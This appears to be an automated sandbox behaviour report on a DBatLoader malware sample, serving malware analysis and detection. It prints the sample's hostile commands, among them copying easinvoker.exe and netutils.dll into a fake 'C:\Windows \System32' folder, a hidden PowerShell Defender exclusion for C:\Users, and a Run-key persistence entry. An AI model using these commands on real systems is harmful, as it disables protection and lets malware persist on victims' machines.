Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe
Source: C:\Windows \System32\easinvoker.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
Source: unknown	Process created: C:\Users\Public\Libraries\Gjwyghlf.PIF "C:\Users\Public\Libraries\Gjwyghlf.PIF"
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
Source: unknown	Process created: C:\Users\Public\Libraries\Gjwyghlf.PIF "C:\Users\Public\Libraries\Gjwyghlf.PIF"
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" "	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6	Jump to behavior
Source: C:\Windows \System32\easinvoker.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	Process created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4wn1jn4.khu.ps1

Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_02866DC0 CoCreateInstance,

0_2_02866DC0

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_02857FB8 GetDiskFreeSpaceA,

0_2_02857FB8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_01
Source: C:\Users\Public\Libraries\flhgywjG.bat	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-5D7S76
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\flhgywjG.bat	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Gjwyghlf.PIF	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: tTIYCp2sf4.exe

Static file information: File size 1113600 > 1048576

Source:	Binary string: easinvoker.pdb source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr
Source:	Binary string: easinvoker.pdbH source: tTIYCp2sf4.exe, 00000000.00000002.558279383.000000007F300000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.540595825.0000000003971000.00000004.00000020.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000003.537518251.000000007EE70000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.542660336.000000000060C000.00000004.00000020.00020000.00000000.sdmp, easinvoker.exe, 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, easinvoker.exe.5.dr, easinvoker.exe.0.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 17.2.flhgywjG.bat.400000.0.unpack
Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 20.2.flhgywjG.bat.400000.0.unpack
Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 22.2.flhgywjG.bat.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 17.2.flhgywjG.bat.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 20.2.flhgywjG.bat.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
Source: C:\Users\Public\Libraries\flhgywjG.bat	Unpacked PE file: 22.2.flhgywjG.bat.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;

Yara detected DBatLoader

Source: Yara match	File source: tTIYCp2sf4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.tTIYCp2sf4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\Public\Libraries\Gjwyghlf.PIF, type: DROPPED

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"			Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02869AE0 push 02869B18h; ret	0_2_02869B10
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_028762F4 push 0287635Fh; ret	0_2_02876357
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0285CBD0 push 0285CD56h; ret	0_2_0285CD4E
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0286BB4C push 0286BB84h; ret	0_2_0286BB7C
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02856374 push 028563CFh; ret	0_2_028563C7
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_028760AC push 02876125h; ret	0_2_0287611D
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02863050 push 0286309Dh; ret	0_2_02863095
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_028761F8 push 02876288h; ret	0_2_02876280
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02867904 push 02867981h; ret	0_2_02867979
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02876144 push 028761ECh; ret	0_2_028761E4
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02866940 push 028669EBh; ret	0_2_028669E3
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02862F44 push 02862FBAh; ret	0_2_02862FB2
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02856768 push 028567AAh; ret	0_2_028567A2
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0285D584 push 0285D5B0h; ret	0_2_0285D5A8
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_02875548 push 02875760h; ret	0_2_02875758
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Code function: 0_2_0286C56C push ecx; mov dword ptr [esp], edx	0_2_0286C571
Source: C:\Windows \System32\easinvoker.exe	Code function: 11_2_613CF021 pushfq ; iretd	11_2_613CF02A
Source: C:\Windows \System32\easinvoker.exe	Code function: 11_2_613CFD00 pushfq ; ret	11_2_613CFD01
Source: C:\Windows \System32\easinvoker.exe	Code function: 11_2_613D0DFE push rsp; iretd	11_2_613D0DFF

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_02867B24 LoadLibraryA,GetProcAddress,WriteProcessMemory,FreeLibrary,

0_2_02867B24

Source: flhgywjG.bat.0.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: easinvoker.exe.0.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: /4
Source: netutils.dll.0.dr	Static PE information: section name: /19
Source: netutils.dll.0.dr	Static PE information: section name: /31
Source: netutils.dll.0.dr	Static PE information: section name: /45
Source: netutils.dll.0.dr	Static PE information: section name: /57
Source: netutils.dll.0.dr	Static PE information: section name: /70
Source: netutils.dll.0.dr	Static PE information: section name: /81
Source: netutils.dll.0.dr	Static PE information: section name: /92
Source: easinvoker.exe.5.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.8.dr	Static PE information: section name: .....
Source: netutils.dll.8.dr	Static PE information: section name: .....
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ....
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ....
Source: netutils.dll.8.dr	Static PE information: section name: ....
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: /4
Source: netutils.dll.8.dr	Static PE information: section name: /19
Source: netutils.dll.8.dr	Static PE information: section name: /31
Source: netutils.dll.8.dr	Static PE information: section name: /45
Source: netutils.dll.8.dr	Static PE information: section name: /57
Source: netutils.dll.8.dr	Static PE information: section name: /70
Source: netutils.dll.8.dr	Static PE information: section name: /81
Source: netutils.dll.8.dr	Static PE information: section name: /92

Source: initial sample

Static PE information: section where entry point is pointing to: .....

Source: Gjwyghlf.PIF.0.dr	Static PE information: real checksum: 0x0 should be: 0x11bf5a
Source: netutils.dll.0.dr	Static PE information: real checksum: 0x233d5 should be: 0x1f661
Source: tTIYCp2sf4.exe	Static PE information: real checksum: 0x0 should be: 0x11bf5a
Source: netutils.dll.8.dr	Static PE information: real checksum: 0x233d5 should be: 0x1f661

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows \System32\easinvoker.exe

Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

File created: C:\Users\Public\Libraries\Gjwyghlf.PIF

Jump to dropped file

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

File created: C:\Users\Public\Libraries\flhgywjG.bat

Jump to dropped file

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	File created: C:\Users\Public\Libraries\flhgywjG.bat	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	File created: C:\Users\Public\Libraries\Gjwyghlf.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\netutils.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\easinvoker.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	File created: C:\Windows \System32\netutils.dll			Jump to dropped file

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Gjwyghlf			Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Gjwyghlf			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
Source: C:\Users\user\Desktop\tTIYCp2sf4.exe	Memory written: PID: 7068 base: 5015CC value: E9 7F 5B F0 FF	Jump to behavior
